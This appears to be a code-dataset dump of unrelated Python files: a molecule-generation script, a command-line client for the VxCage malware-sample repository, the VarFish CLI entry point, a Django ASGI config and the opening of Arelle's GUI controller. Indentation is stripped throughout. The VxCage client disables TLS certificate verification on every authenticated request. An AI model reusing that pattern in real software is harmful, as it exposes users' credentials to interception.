char_dict={'H': 0, 'C': 1, 'N': 2, 'O': 3, 'F': 4, 'P': 5,
'S': 6, 'Cl': 7, 'Br': 8, 'I': 9,
'n': 10, 'c': 11, 'o': 12, 's': 13,
'1': 14, '2': 15, '3': 16, '4': 17, '5': 18, '6': 19, '7': 20, '8': 21,
'(': 22, ')': 23, '[': 24, ']': 25, '-': 26, '=': 27, '#': 28,
'/': 29, '\\': 30, '+': 31, '@': 32, 'X': 33, 'Y': 34}
vocab_size = len(char_list)
latent_size = 300
batch_size = 100
sample_size = 100
seq_length = 110
dev = 0.0
#input properties, [logP,SAS,TPSA]
#task_val=np.array([1.5,2,30])
if len(sys.argv)<=3:
print("python gen_CARAE_con_logP_SAS_TPSA logP SAS TPSA ")
sys.exit()
logP_set=float(sys.argv[1])
SAS_set=float(sys.argv[2])
TPSA_set=float(sys.argv[3])
task_val=np.array([logP_set,SAS_set,TPSA_set])
print(task_val)
model_name="CARAE_logP_SAS_TPSA"
save_dir="./save/"+model_name
out_dir0="out_"+model_name+"G_%d_%d_%d" %(int(logP_set*10),int(SAS_set),int(TPSA_set))
if not os.path.exists(out_dir0):
os.makedirs(out_dir0)
property_task=3
task_nor=np.array([10.0,10.0,150.0])
task_low=np.array([-1.0,1.0,0.0])
task_high=np.array([5.0,8.0,150.0])
task_low=task_low/task_nor
task_high=task_high/task_nor
task_val=task_val/task_nor
Ntest=10000
num_test_batches = int(Ntest/batch_size)
model = ARAE(vocab_size = vocab_size,
batch_size = batch_size,
latent_size = latent_size,
sample_size = sample_size,
property_task = property_task
)
total_st=time.time()
epochs=[39]
for epoch in epochs:
out_dir=out_dir0+"/%d" %epoch
if not os.path.exists(out_dir):
os.makedirs(out_dir)
output_file=out_dir+"/result_"+model_name+"_%d.txt" %epoch
fp0=open(output_file,"w")
model.restore(save_dir+"/model.ckpt-%d" %epoch)
latent_vector_fake=[]
Y_fake=[]
P_fake=[]
smiles_fake=[]
for itest in range(num_test_batches):
# fp0.write('**********************************************\n')
decoder_state = model.get_decoder_state()
s = np.random.normal(0.0, 0.25, [batch_size, sample_size]).clip(-1.0,1.0)
# p = p_batches2[itest]
# cp = np.random.uniform(task_low,task_high, [batch_size, property_task])
p=np.empty([batch_size,property_task])
p[:,0].fill(task_val[0])
p[:,1].fill(task_val[1])
p[:,2].fill(task_val[2])
P_fake.append(p)
latent_vector = model.generate_latent_vector(s)
latent_vector_fake.append(latent_vector)
start_token = np.array([char_list.index('X') for i in range(batch_size)])
start_token = np.reshape(start_token, [batch_size, 1])
length = np.array([1 for i in range(batch_size)])
smiles = ['' for i in range(batch_size)]
Y=[]
for i in range(seq_length):
m, state = model.generate_molecule(start_token, latent_vector, length, p, decoder_state)
decoder_state = state
start_token = np.argmax(m,2)
Y.append(start_token[:,0])
smiles = [s + str(char_list[start_token[j][0]]) for j,s in enumerate(smiles)]
Y=list(map(list,zip(*Y)))
Y_fake.append(Y)
smiles_fake+=smiles
latent_vector_fake=np.array(latent_vector_fake,dtype="float32").reshape(-1,latent_size)
P_fake=np.array(P_fake,dtype="float32").reshape(-1,property_task)
Y_fake=np.array(Y_fake,dtype="int32").reshape(-1,seq_length)
outfile=out_dir+"/Zfake.npy"
np.save(outfile,latent_vector_fake)
outfile=out_dir+"/Pfake.npy"
np.save(outfile,P_fake)
outfile=out_dir+"/Yfake.npy"
np.save(outfile,Y_fake)
outfile=out_dir+"/smiles_fake.txt"
fp_out=open(outfile,'w')
for line in smiles_fake:
line_out=line+"\n"
fp_out.write(line_out)
fp_out.close()
total_et=time.time()
print ("total_time : ", total_et-total_st)
|
[] |
[] |
[
"CUDA_VISIBLE_DEVICES"
] |
[]
|
["CUDA_VISIBLE_DEVICES"]
|
python
| 1 | 0 | |
bin/vxcage.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import getpass
import argparse
import readline
import json
import rlcompleter
import atexit
import glob
# tab completion
def complete(text, state):
return (glob.glob(text+'*')+[None])[state]
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(complete)
# history file
histfile = os.path.join(os.environ['HOME'], '.vxcage_history')
try:
readline.read_history_file(histfile)
except IOError:
pass
atexit.register(readline.write_history_file, histfile)
del histfile, readline, rlcompleter
try:
import requests
from progressbar import *
from prettytable import PrettyTable
except ImportError as e:
sys.exit("ERROR: Missing dependency: %s" % e)
def color(text, color_code):
return '\x1b[%dm%s\x1b[0m' % (color_code, text)
def cyan(text):
return color(text, 36)
def bold(text):
return color(text, 1)
def logo():
print("")
print(cyan(" `o O o O .oOo .oOoO' .oOoO .oOo. "))
print(cyan(" O o OoO O O o o O OooO' "))
print(cyan(" o O o o o o O O o O "))
print(cyan(" `o' O O `OoO' `OoO'o `OoOo `OoO' "))
print(cyan(" O "))
print(cyan(" OoO' ") + " by nex")
print("")
def help():
print("Available commands:")
print(" " + bold("tags") + " Retrieve list of tags")
print(" " + bold("find") + " Query a file by md5, sha256, ssdeep, imphash, tag or date")
print(" " + bold("get") + " Download a file by sha256")
print(" " + bold("dump") + " Dump a list of md5, sha256, ssdeep hashes")
print(" " + bold("add") + " Upload a file to the server")
print(" " + bold("last") + " Retrieve a list of the last x files uploaded")
print(" " + bold("total") + " Total number of samples")
print(" " + bold("stats") + " File type stats")
print(" " )
print(" " + bold("version") + " Version of remote vxcage server")
print(" " + bold("license") + " Print the software license")
print(" " )
print(" " + bold("help | ?") + " Show this help")
print(" " + bold("exit | quit") + " Exit cli application")
class VxCage(object):
def __init__(self, host, port, xmock, ssl=False, auth=False):
self.host = host
self.port = port
self.ssl = ssl
self.auth = auth
self.xmock = xmock
self.username = None
self.password = None
def authenticate(self):
if self.auth:
self.username = raw_input("Username: ")
self.password = getpass.getpass("Password: ")
def build_url(self, route):
if self.ssl:
url = "https://"
if self.port is None:
self.port = 443
else:
if self.port is None:
self.port = 8080
url = "http://"
url += "%s:%s%s%s" % (self.host, self.port, self.xmock, route)
return url
def check_errors(self, code):
if code == 400:
print("ERROR: Invalid request format")
return True
elif code == 500:
print("ERROR: Unexpected error, check your server logs")
return True
else:
return False
def tags_list(self):
req = requests.get(self.build_url("/tags/list"),
auth=(self.username, self.password),
verify=False)
try:
res = req.json()
except:
try:
res = req.json
except Exception as e:
print("ERROR: Unable to parse results: {0}".format(e))
return
if self.check_errors(req.status_code):
return
table = PrettyTable(["tag"])
table.align = "l"
table.padding_width = 1
for tag in res:
table.add_row([tag])
print(table)
print("Total: %s" % len(res))
def dump_list(self, hType):
req = requests.get(self.build_url("/malware/dump/"+hType),
auth=(self.username, self.password),
verify=False)
try:
res = req.json()
except:
try:
res = req.json
except Exception as e:
print("ERROR: Unable to parse results: {0}".format(e))
return
if self.check_errors(req.status_code):
return
table = PrettyTable([hType])
table.align = "l"
table.padding_width = 1
for hType in res:
table.add_row(hType)
print(table)
print("Total: %s" % len(res))
def malware_total(self):
req = requests.get(self.build_url("/malware/total"),
auth=(self.username, self.password),
verify=False)
try:
res = req.json()
except:
try:
res = req.json
except Exception as e:
print("ERROR: Unable to parse results: {0}".format(e))
return
if self.check_errors(req.status_code):
return
print("Total: %s" % res)
def malware_stats_total(self):
req = requests.get(self.build_url("/malware/total/stats"),
auth=(self.username, self.password),
verify=False)
try:
res = req.json()
except:
try:
res = req.json
except Exception as e:
print("ERROR: Unable to parse results: {0}".format(e))
return
if self.check_errors(req.status_code):
return
self._print_list(res, ["File_type", "Count"])
def server_version(self):
req = requests.get(self.build_url("/about"),
auth=(self.username, self.password),
verify=False)
try:
res = req.json()
except:
try:
res = req.json
except Exception as e:
print("ERROR: Unable to parse results: {0}".format(e))
return
if self.check_errors(req.status_code):
return
self._print_kv(res)
def license(self):
req = requests.get(self.build_url("/about/license"),
auth=(self.username, self.password),
verify=False)
if self.check_errors(req.status_code):
return
print req.text
def find_malware(self, term, value):
term = term.lower()
terms = ["md5", "sha256", "ssdeep", "imphash", "tag", "date"]
if not term in terms:
print("ERROR: Invalid search term [%s]" % (", ".join(terms)))
return
payload = {term : value}
req = requests.post(self.build_url("/malware/find"),
data=payload,
auth=(self.username, self.password),
verify=False)
try:
res = req.json()
except:
try:
res = req.json
except Exception as e:
print("ERROR: Unable to parse results: {0}".format(e))
return
if req.status_code == 404:
print("No file found matching your search")
return
if self.check_errors(req.status_code):
return
self._print_malware_info(res)
def last_x(self, x):
req = requests.get(self.build_url("/malware/last/"+x),
auth=(self.username, self.password),
verify=False)
try:
res = req.json()
except:
try:
res = req.json
except Exception as e:
print("ERROR: Unable to parse results: {0}".format(e))
return
if req.status_code == 404:
print("No data found matching your search")
return
if self.check_errors(req.status_code):
return
self._print_malware_info(res)
def get_malware(self, sha256, path):
if not os.path.exists(path):
print("ERROR: Folder does not exist at path %s" % path)
return
if not os.path.isdir(path):
print("ERROR: The path specified is not a directory.")
return
req = requests.get(self.build_url("/malware/get/%s" % sha256),
auth=(self.username, self.password),
verify=False)
if req.status_code == 404:
print("File not found")
return
if self.check_errors(req.status_code):
return
size = int(req.headers["Content-Length"].strip())
bytes = 0
widgets = [
"Download: ",
Percentage(),
" ",
Bar(marker=":"),
" ",
ETA(),
" ",
FileTransferSpeed()
]
progress = ProgressBar(widgets=widgets, maxval=size).start()
destination = os.path.join(path, sha256)
binary = open(destination, "wb")
for buf in req.iter_content(1024):
if buf:
binary.write(buf)
bytes += len(buf)
progress.update(bytes)
progress.finish()
binary.close()
print("File downloaded at path: %s" % destination)
def add_malware(self, path, tags=None):
if not os.path.exists(path):
print("ERROR: File does not exist at path %s" % path)
return
files = {"file": (os.path.basename(path), open(path, "rb"))}
payload = {"tags" : tags}
req = requests.post(self.build_url("/malware/add"),
auth=(self.username, self.password),
verify=False,
files=files,
data=payload)
if not self.check_errors(req.status_code):
print("File uploaded successfully")
def _is_number(self, s):
try:
float(s)
return True
except ValueError:
return False
def _print_kv(self, res):
table = PrettyTable(["Key","Value"])
table.align = "l"
table.padding_width = 1
for k,v in res.items():
table.add_row([k, v])
print(table)
def _print_list(self, res, title = ["Key", "Value"]):
table = PrettyTable(title)
table.align = "l"
table.padding_width = 1
for v in res:
table.add_row([v[0],v[1]])
print(table)
def _print_malware_info(self, res):
if isinstance(res, dict):
for key, value in res.items():
if key == "tags":
print("%s: %s" % (bold(key), ",".join(value)))
elif key == "virustotal":
vt = res["virustotal"]
try:
print('\033[1m' + "virustotal" + '\033[0m' + ": " + str(vt["positives"]) + "/" + str(vt["total"]) + " matches")
except:
print('\033[1m' + "virustotal" + '\033[0m' + ": -/- matches")
elif key == "exif":
exif = res["exif"]
#print('\033[1m' + "timestamp" + '\033[0m' + ": " + exif["EXE:TimeStamp"])
#print('\033[1m' + "character set" + '\033[0m' + ": " + exif["EXE:CharacterSet"])
else:
print("%s: %s" % (bold(key), value))
else:
table = PrettyTable(["md5",
"sha256",
"file_name",
"file_type",
"file_size",
"virustotal",
"created_at",
"tags"])
table.align = "l"
table.padding_width = 1
for entry in res:
table.add_row([entry["md5"],
entry["sha256"],
entry["file_name"],
entry["file_type"],
entry["file_size"],
entry["virustotal"]["virustotal"],
entry["created_at"],
", ".join(entry["tags"])])
print(table)
print("Total: %d" % len(res))
def run(self):
self.authenticate()
while True:
try:
raw = raw_input(cyan("vxcage> "))
except KeyboardInterrupt:
print("")
continue
except EOFError:
print("")
break
command = raw.strip().split(" ")
if (command[0] == "help" or command[0] == "?"):
help()
elif (command[0] == "version" or command[0] == "about"):
self.server_version()
elif (command[0] == "license"):
self.license()
elif command[0] == "total":
self.malware_total()
elif command[0] == "stats":
self.malware_stats_total()
elif command[0] == "tags":
self.tags_list()
elif command[0] == "last":
if len(command) == 2 and self._is_number(command[1]):
self.last_x(command[1])
else:
print("ERROR: Missing arguments (e.g. \"last <x>\")")
elif command[0] == "dump":
if len(command) == 2 and command[1] in ['md5', 'sha256', 'ssdeep']:
self.dump_list(command[1])
else:
print("ERROR: Missing arguments (e.g. \"dump <type>\")")
print(" Available types: md5, sha256, ssdeep")
elif command[0] == "find":
if len(command) == 3 and command[1] in ['md5', 'sha256', 'ssdeep', 'imphash', 'tag', 'date']:
self.find_malware(command[1], command[2])
else:
print("ERROR: Missing arguments (e.g. \"find <key> <value>\")")
print(" Available keys: md5, sha256, ssdeep, imphash, tag or date")
elif command[0] == "get":
if len(command) == 3:
self.get_malware(command[1], command[2])
else:
print("ERROR: Missing arguments (e.g. \"get <sha256> <path>\")")
elif command[0] == "add":
if len(command) == 2:
self.add_malware(command[1])
elif len(command) == 3:
self.add_malware(command[1], command[2])
else:
print("ERROR: Missing arguments (e.g. \"add <path> <comma separated tags>\")")
elif (command[0] == "quit" or command[0] == "exit"):
break
if __name__ == "__main__":
logo()
parser = argparse.ArgumentParser()
parser.add_argument("-H", "--host", help="Host of VxCage server", default="localhost", action="store", required=False)
parser.add_argument("-p", "--port", help="Port of VxCage server", action="store", required=False)
parser.add_argument("-s", "--ssl", help="Enable if the server is running over SSL", default=False, action="store_true", required=False)
parser.add_argument("-a", "--auth", help="Enable if the server is prompting an HTTP authentication", default=False, action="store_true", required=False)
parser.add_argument("-x", "--xmock", help="(api testing) URL of VxCage server mock service", default="", action="store", required=False)
args = parser.parse_args()
vx = VxCage(host=args.host, port=args.port, ssl=args.ssl, auth=args.auth, xmock=args.xmock)
vx.run()
|
[] |
[] |
[
"HOME"
] |
[]
|
["HOME"]
|
python
| 1 | 0 | |
varfish_cli/__main__.py
|
"""Main entry point for VarFish CLI."""
import argparse
import logging
import os
import sys
import logzero
import toml
from logzero import logger
from varfish_cli import __version__
from .common import run_nocmd, CommonConfig
from .case import setup_argparse as setup_argparse_case
from .case import run as run_case
#: Paths to search the global configuration in.
GLOBAL_CONFIG_PATHS = ("~/.varfishrc.toml",)
def setup_argparse_only(): # pragma: nocover
"""Wrapper for ``setup_argparse()`` that only returns the parser.
Only used in sphinx documentation via ``sphinx-argparse``.
"""
return setup_argparse()[0]
def setup_argparse():
"""Create argument parser."""
# Construct argument parser and set global options.
parser = argparse.ArgumentParser(prog="varfish-cli")
parser.add_argument("--verbose", action="store_true", default=False, help="Increase verbosity.")
parser.add_argument("--version", action="version", version="%%(prog)s %s" % __version__)
group = parser.add_argument_group("Basic Configuration")
group.add_argument(
"--no-verify-ssl",
dest="verify_ssl",
default=True,
action="store_false",
help="Disable HTTPS SSL verification",
)
group.add_argument(
"--config",
default=os.environ.get("VARFISH_CONFIG_PATH", None),
help="Path to configuration file.",
)
group.add_argument(
"--varfish-server-url",
default=os.environ.get("VARFISH_SERVER_URL", None),
help="VarFish server URL key to use, defaults to env VARFISH_SERVER_URL.",
)
group.add_argument(
"--varfish-api-token",
default=os.environ.get("VARFISH_API_TOKEN", None),
help="VarFish API token to use, defaults to env VARFISH_API_TOKEN.",
)
# Add sub parsers for each argument.
subparsers = parser.add_subparsers(dest="cmd")
setup_argparse_case(subparsers.add_parser("case", help="Work with cases."))
return parser, subparsers
def main(argv=None):
"""Main entry point before parsing command line arguments."""
# Setup command line parser.
parser, subparsers = setup_argparse()
# Actually parse command line arguments.
args = parser.parse_args(argv)
# Setup logging incl. verbosity.
if args.verbose: # pragma: no cover
level = logging.DEBUG
else:
# Remove module name and line number if not running in debug mode.s
formatter = logzero.LogFormatter(
fmt="%(color)s[%(levelname)1.1s %(asctime)s]%(end_color)s %(message)s"
)
logzero.formatter(formatter)
level = logging.INFO
logzero.loglevel(level=level)
# Load configuration, if any.
if args.config:
config_paths = (args.config,)
else:
config_paths = GLOBAL_CONFIG_PATHS
for config_path in config_paths:
config_path = os.path.expanduser(os.path.expandvars(config_path))
if os.path.exists(config_path):
with open(config_path, "rt") as tomlf:
toml_config = toml.load(tomlf)
break
else:
toml_config = None
logger.info("Could not find any of the global configuration files %s.", config_paths)
# Merge configuration from command line/environment args and configuration file.
config = CommonConfig.create(args, toml_config)
# Handle the actual command line.
cmds = {None: run_nocmd, "case": run_case}
res = cmds[args.cmd](
config, toml_config, args, parser, subparsers.choices[args.cmd] if args.cmd else None
)
if not res:
logger.info("All done. Have a nice day!")
else: # pragma: nocover
logger.error("Something did not work out correctly.")
return res
if __name__ == "__main__": # pragma: no cover
sys.exit(main(sys.argv))
|
[] |
[] |
[
"VARFISH_API_TOKEN",
"VARFISH_SERVER_URL",
"VARFISH_CONFIG_PATH"
] |
[]
|
["VARFISH_API_TOKEN", "VARFISH_SERVER_URL", "VARFISH_CONFIG_PATH"]
|
python
| 3 | 0 | |
cloak/asgi.py
|
"""
ASGI config for cloak project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'cloak.settings')
application = get_asgi_application()
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
arelle/CntlrWinMain.py
|
'''
Created on Oct 3, 2010
This module is Arelle's controller in windowing interactive UI mode
@author: Mark V Systems Limited
(c) Copyright 2010 Mark V Systems Limited, All rights reserved.
'''
from arelle import PythonUtil # define 2.x or 3.x string types
import os, sys, subprocess, pickle, time, locale, re
from tkinter import (Tk, TclError, Toplevel, Menu, PhotoImage, StringVar, BooleanVar, N, S, E, W, EW,
HORIZONTAL, VERTICAL, END, font as tkFont)
try:
from tkinter.ttk import Frame, Button, Label, Combobox, Separator, PanedWindow, Notebook
except ImportError: # 3.0 versions of tkinter
from ttk import Frame, Button, Label, Combobox, Separator, PanedWindow, Notebook
import tkinter.tix
import tkinter.filedialog
import tkinter.messagebox, traceback
from arelle.Locale import format_string
from arelle.CntlrWinTooltip import ToolTip
from arelle import XbrlConst
from arelle.PluginManager import pluginClassMethods
from arelle.UrlUtil import isHttpUrl
import logging
import threading, queue
from arelle import Cntlr
from arelle import (DialogURL, DialogLanguage,
DialogPluginManager, DialogPackageManager,
ModelDocument,
ModelManager,
PackageManager,
RenderingEvaluator,
TableStructure,
ViewWinDTS,
ViewWinProperties, ViewWinConcepts, ViewWinRelationshipSet, ViewWinFormulae,
ViewWinFactList, ViewWinFactTable, ViewWinRenderedGrid, ViewWinXml,
ViewWinRoleTypes, ViewFileRoleTypes, ViewFileConcepts,
ViewWinTests, ViewWinTree, ViewWinVersReport, ViewWinRssFeed,
ViewFileTests,
ViewFileRenderedGrid,
ViewFileRelationshipSet,
Updater
)
from arelle.ModelFormulaObject import FormulaOptions
from arelle.FileSource import openFileSource
restartMain = True
class CntlrWinMain (Cntlr.Cntlr):
def __init__(self, parent):
super(CntlrWinMain, self).__init__(hasGui=True)
self.parent = parent
self.filename = None
self.dirty = False
overrideLang = self.config.get("labelLangOverride")
self.labelLang = overrideLang if overrideLang else self.modelManager.defaultLang
self.data = {}
if self.isMac: # mac Python fonts bigger than other apps (terminal, text edit, Word), and to windows Arelle
_defaultFont = tkFont.nametofont("TkDefaultFont") # label, status bar, treegrid
_defaultFont.configure(size=11)
_textFont = tkFont.nametofont("TkTextFont") # entry widget and combobox entry field
_textFont.configure(size=11)
#parent.option_add("*Font", _defaultFont) # would be needed if not using defaulted font
toolbarButtonPadding = 1
else:
toolbarButtonPadding = 4
tkinter.CallWrapper = TkinterCallWrapper
imgpath = self.imagesDir + os.sep
if self.isMSW:
icon = imgpath + "arelle.ico"
parent.iconbitmap(icon, default=icon)
#image = PhotoImage(file=path + "arelle32.gif")
#label = Label(None, image=image)
#parent.iconwindow(label)
else:
parent.iconbitmap("@" + imgpath + "arelle.xbm")
# try with gif file
#parent.iconbitmap(path + "arelle.gif")
self.menubar = Menu(self.parent)
self.parent["menu"] = self.menubar
self.fileMenu = Menu(self.menubar, tearoff=0)
self.fileMenuLength = 1
for label, command, shortcut_text, shortcut in (
#(_("New..."), self.fileNew, "Ctrl+N", "<Control-n>"),
(_("Open File..."), self.fileOpen, "Ctrl+O", "<Control-o>"),
(_("Open Web..."), self.webOpen, "Shift+Alt+O", "<Shift-Alt-o>"),
(_("Import File..."), self.importFileOpen, None, None),
(_("Import Web..."), self.importWebOpen, None, None),
("PLUG-IN", "CntlrWinMain.Menu.File.Open", None, None),
(_("Save..."), self.fileSave, "Ctrl+S", "<Control-s>"),
(_("Save DTS Package"), self.saveDTSpackage, None, None),
("PLUG-IN", "CntlrWinMain.Menu.File.Save", None, None),
(_("Close"), self.fileClose, "Ctrl+W", "<Control-w>"),
(None, None, None, None),
(_("Quit"), self.quit, "Ctrl+Q", "<Control-q>"),
#(_("Restart"), self.restart, None, None),
(None, None, None, None),
("",None,None,None) # position for file history
):
if label is None:
self.fileMenu.add_separator()
elif label == "PLUG-IN":
for pluginMenuExtender in pluginClassMethods(command):
pluginMenuExtender(self, self.fileMenu)
self.fileMenuLength += 1
else:
self.fileMenu.add_command(label=label, underline=0, command=command, accelerator=shortcut_text)
self.parent.bind(shortcut, command)
self.fileMenuLength += 1
self.loadFileMenuHistory()
self.menubar.add_cascade(label=_("File"), menu=self.fileMenu, underline=0)
toolsMenu = Menu(self.menubar, tearoff=0)
validateMenu = Menu(self.menubar, tearoff=0)
toolsMenu.add_cascade(label=_("Validation"), menu=validateMenu, underline=0)
validateMenu.add_command(label=_("Validate"), underline=0, command=self.validate)
self.modelManager.validateDisclosureSystem = self.config.setdefault("validateDisclosureSystem",False)
self.validateDisclosureSystem = BooleanVar(value=self.modelManager.validateDisclosureSystem)
self.validateDisclosureSystem.trace("w", self.setValidateDisclosureSystem)
validateMenu.add_checkbutton(label=_("Disclosure system checks"), underline=0, variable=self.validateDisclosureSystem, onvalue=True, offvalue=False)
validateMenu.add_command(label=_("Select disclosure system..."), underline=0, command=self.selectDisclosureSystem)
self.modelManager.validateCalcLB = self.config.setdefault("validateCalcLB",False)
self.validateCalcLB = BooleanVar(value=self.modelManager.validateCalcLB)
self.validateCalcLB.trace("w", self.setValidateCalcLB)
validateMenu.add_checkbutton(label=_("Calc Linkbase checks"), underline=0, variable=self.validateCalcLB, onvalue=True, offvalue=False)
self.modelManager.validateInferDecimals = self.config.setdefault("validateInferDecimals",False)
self.validateInferDecimals = BooleanVar(value=self.modelManager.validateInferDecimals)
self.validateInferDecimals.trace("w", self.setValidateInferDecimals)
validateMenu.add_checkbutton(label=_("Infer Decimals in calculations"), underline=0, variable=self.validateInferDecimals, onvalue=True, offvalue=False)
self.modelManager.validateUtr = self.config.setdefault("validateUtr",True)
self.validateUtr = BooleanVar(value=self.modelManager.validateUtr)
self.validateUtr.trace("w", self.setValidateUtr)
validateMenu.add_checkbutton(label=_("Unit Type Registry validation"), underline=0, variable=self.validateUtr, onvalue=True, offvalue=False)
for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.Validation"):
pluginMenuExtender(self, validateMenu)
formulaMenu = Menu(self.menubar, tearoff=0)
formulaMenu.add_command(label=_("Parameters..."), underline=0, command=self.formulaParametersDialog)
toolsMenu.add_cascade(label=_("Formula"), menu=formulaMenu, underline=0)
self.modelManager.formulaOptions = FormulaOptions(self.config.get("formulaParameters"))
toolsMenu.add_command(label=_("Compare DTSes..."), underline=0, command=self.compareDTSes)
cacheMenu = Menu(self.menubar, tearoff=0)
rssWatchMenu = Menu(self.menubar, tearoff=0)
rssWatchMenu.add_command(label=_("Options..."), underline=0, command=self.rssWatchOptionsDialog)
rssWatchMenu.add_command(label=_("Start"), underline=0, command=lambda: self.rssWatchControl(start=True))
rssWatchMenu.add_command(label=_("Stop"), underline=0, command=lambda: self.rssWatchControl(stop=True))
toolsMenu.add_cascade(label=_("RSS Watch"), menu=rssWatchMenu, underline=0)
self.modelManager.rssWatchOptions = self.config.setdefault("rssWatchOptions", {})
toolsMenu.add_cascade(label=_("Internet"), menu=cacheMenu, underline=0)
self.webCache.workOffline = self.config.setdefault("workOffline",False)
self.workOffline = BooleanVar(value=self.webCache.workOffline)
self.workOffline.trace("w", self.setWorkOffline)
cacheMenu.add_checkbutton(label=_("Work offline"), underline=0, variable=self.workOffline, onvalue=True, offvalue=False)
'''
self.webCache.recheck = self.config.setdefault("webRecheck",False)
self.webRecheck = BooleanVar(value=self.webCache.webRecheck)
self.webRecheck.trace("w", self.setWebRecheck)
cacheMenu.add_checkbutton(label=_("Recheck file dates weekly"), underline=0, variable=self.workOffline, onvalue=True, offvalue=False)
self.webCache.notify = self.config.setdefault("",False)
self.downloadNotify = BooleanVar(value=self.webCache.retrievalNotify)
self.downloadNotify.trace("w", self.setRetrievalNotify)
cacheMenu.add_checkbutton(label=_("Notify file downloads"), underline=0, variable=self.workOffline, onvalue=True, offvalue=False)
'''
cacheMenu.add_command(label=_("Clear cache"), underline=0, command=self.confirmClearWebCache)
cacheMenu.add_command(label=_("Manage cache"), underline=0, command=self.manageWebCache)
cacheMenu.add_command(label=_("Proxy Server"), underline=0, command=self.setupProxy)
logmsgMenu = Menu(self.menubar, tearoff=0)
toolsMenu.add_cascade(label=_("Messages log"), menu=logmsgMenu, underline=0)
logmsgMenu.add_command(label=_("Clear"), underline=0, command=self.logClear)
logmsgMenu.add_command(label=_("Save to file"), underline=0, command=self.logSaveToFile)
self.modelManager.collectProfileStats = self.config.setdefault("collectProfileStats",False)
self.collectProfileStats = BooleanVar(value=self.modelManager.collectProfileStats)
self.collectProfileStats.trace("w", self.setCollectProfileStats)
logmsgMenu.add_checkbutton(label=_("Collect profile stats"), underline=0, variable=self.collectProfileStats, onvalue=True, offvalue=False)
logmsgMenu.add_command(label=_("Log profile stats"), underline=0, command=self.showProfileStats)
logmsgMenu.add_command(label=_("Clear profile stats"), underline=0, command=self.clearProfileStats)
toolsMenu.add_command(label=_("Language..."), underline=0, command=lambda: DialogLanguage.askLanguage(self))
for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.Tools"):
pluginMenuExtender(self, toolsMenu)
self.menubar.add_cascade(label=_("Tools"), menu=toolsMenu, underline=0)
helpMenu = Menu(self.menubar, tearoff=0)
for label, command, shortcut_text, shortcut in (
(_("Check for updates"), lambda: Updater.checkForUpdates(self), None, None),
(_("Manage plug-ins"), lambda: DialogPluginManager.dialogPluginManager(self), None, None),
(_("Manage packages"), lambda: DialogPackageManager.dialogPackageManager(self), None, None),
("PLUG-IN", "CntlrWinMain.Menu.Help.Upper", None, None),
(None, None, None, None),
(_("About..."), self.helpAbout, None, None),
("PLUG-IN", "CntlrWinMain.Menu.Help.Lower", None, None),
):
if label is None:
helpMenu.add_separator()
elif label == "PLUG-IN":
for pluginMenuExtender in pluginClassMethods(command):
pluginMenuExtender(self, helpMenu)
else:
helpMenu.add_command(label=label, underline=0, command=command, accelerator=shortcut_text)
self.parent.bind(shortcut, command)
for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.Help"):
pluginMenuExtender(self, toolsMenu)
self.menubar.add_cascade(label=_("Help"), menu=helpMenu, underline=0)
windowFrame = Frame(self.parent)
self.statusbar = Label(windowFrame, text=_("Ready..."), anchor=W)
self.statusbarTimerId = self.statusbar.after(5000, self.uiClearStatusTimerEvent)
self.statusbar.grid(row=2, column=0, columnspan=2, sticky=EW)
#self.balloon = tkinter.tix.Balloon(windowFrame, statusbar=self.statusbar)
self.toolbar_images = []
toolbar = Frame(windowFrame)
menubarColumn = 0
self.validateTooltipText = StringVar()
for image, command, toolTip, statusMsg in (
#("images/toolbarNewFile.gif", self.fileNew),
("toolbarOpenFile.gif", self.fileOpen, _("Open local file"), _("Open by choosing a local XBRL file, testcase, or archive file")),
("toolbarOpenWeb.gif", self.webOpen, _("Open web file"), _("Enter an http:// URL of an XBRL file or testcase")),
("toolbarSaveFile.gif", self.fileSave, _("Save file"), _("Saves currently selected local XBRL file")),
("toolbarClose.gif", self.fileClose, _("Close"), _("Closes currently selected instance/DTS or testcase(s)")),
(None,None,None,None),
("toolbarFindMenu.gif", self.find, _("Find"), _("Find dialog for scope and method of searching")),
(None,None,None,None),
("toolbarValidate.gif", self.validate, self.validateTooltipText, _("Validate currently selected DTS or testcase(s)")),
("toolbarCompare.gif", self.compareDTSes, _("Compare DTSes"), _("compare two DTSes")),
(None,None,None,None),
("toolbarLogClear.gif", self.logClear, _("Messages Log | Clear"), _("Clears the messages log")),
#(Combobox(toolbar, textvariable=self.findVar, values=self.findValues,
# ), self.logClear, _("Find options"), _("Select of find options")),
):
if command is None:
tbControl = Separator(toolbar, orient=VERTICAL)
tbControl.grid(row=0, column=menubarColumn, padx=6)
elif isinstance(image, Combobox):
tbControl = image
tbControl.grid(row=0, column=menubarColumn)
else:
image = os.path.join(self.imagesDir, image)
try:
image = PhotoImage(file=image)
self.toolbar_images.append(image)
tbControl = Button(toolbar, image=image, command=command, style="Toolbutton", padding=toolbarButtonPadding)
tbControl.grid(row=0, column=menubarColumn)
except TclError as err:
print(err)
if isinstance(toolTip,StringVar):
ToolTip(tbControl, textvariable=toolTip, wraplength=240)
else:
ToolTip(tbControl, text=toolTip)
menubarColumn += 1
for toolbarExtender in pluginClassMethods("CntlrWinMain.Toolbar"):
toolbarExtender(self, toolbar)
toolbar.grid(row=0, column=0, sticky=(N, W))
paneWinTopBtm = PanedWindow(windowFrame, orient=VERTICAL)
paneWinTopBtm.grid(row=1, column=0, sticky=(N, S, E, W))
paneWinLeftRt = tkinter.PanedWindow(paneWinTopBtm, orient=HORIZONTAL)
paneWinLeftRt.grid(row=0, column=0, sticky=(N, S, E, W))
paneWinLeftRt.bind("<<NotebookTabChanged>>", self.onTabChanged)
paneWinTopBtm.add(paneWinLeftRt)
self.tabWinTopLeft = Notebook(paneWinLeftRt, width=250, height=300)
self.tabWinTopLeft.grid(row=0, column=0, sticky=(N, S, E, W))
paneWinLeftRt.add(self.tabWinTopLeft)
self.tabWinTopRt = Notebook(paneWinLeftRt)
self.tabWinTopRt.grid(row=0, column=0, sticky=(N, S, E, W))
